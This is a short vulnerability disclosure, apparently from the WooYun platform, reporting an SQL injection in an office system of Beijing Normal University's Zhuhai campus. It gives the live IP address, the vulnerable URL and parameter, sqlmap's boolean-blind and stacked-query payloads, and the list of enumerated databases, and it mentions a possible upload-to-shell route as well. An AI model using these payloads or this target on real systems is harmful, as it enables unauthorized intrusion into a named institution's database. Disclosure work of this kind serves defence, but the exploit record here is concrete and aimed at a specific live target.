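2015-12-24: Details reported to the vendor; awaiting vendor handling.
2015-12-29: The vendor chose to ignore the vulnerability; details disclosed to the public.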
RT
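SQL injection in the office system of Beijing Normal University, Zhuhai campus. Remember to self-check for things like arbitrary upload GETSHELL as well; this is only the injection~~
Address: http://59.38.32.31:8080/login/index.jsp
Injection URL: http://59.38.32.31:8080/showphoto.xf?photoid=126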
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Parameter: photoid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: photoid=126 AND 6987=6987

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: photoid=126;WAITFOR DELAY '0:0:5'--
---
web application technology: Servlet 2.4, Tomcat 4.0.4.
back-end DBMS: Microsoft SQL Server 2008
available databases [9]:
[*] FE_APP5
[*] FE_BASE5
[*] FE_ERP
[*] master
[*] model
[*] msdb
[*] ReportServer$FEOA
[*] ReportServer$FEOATempDB
[*] tempdb
There are a lot of tables, so I did not keep running it...
Fix
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-29 17:38
Vulnerability Rank: 4 (WooYun rating)
None yet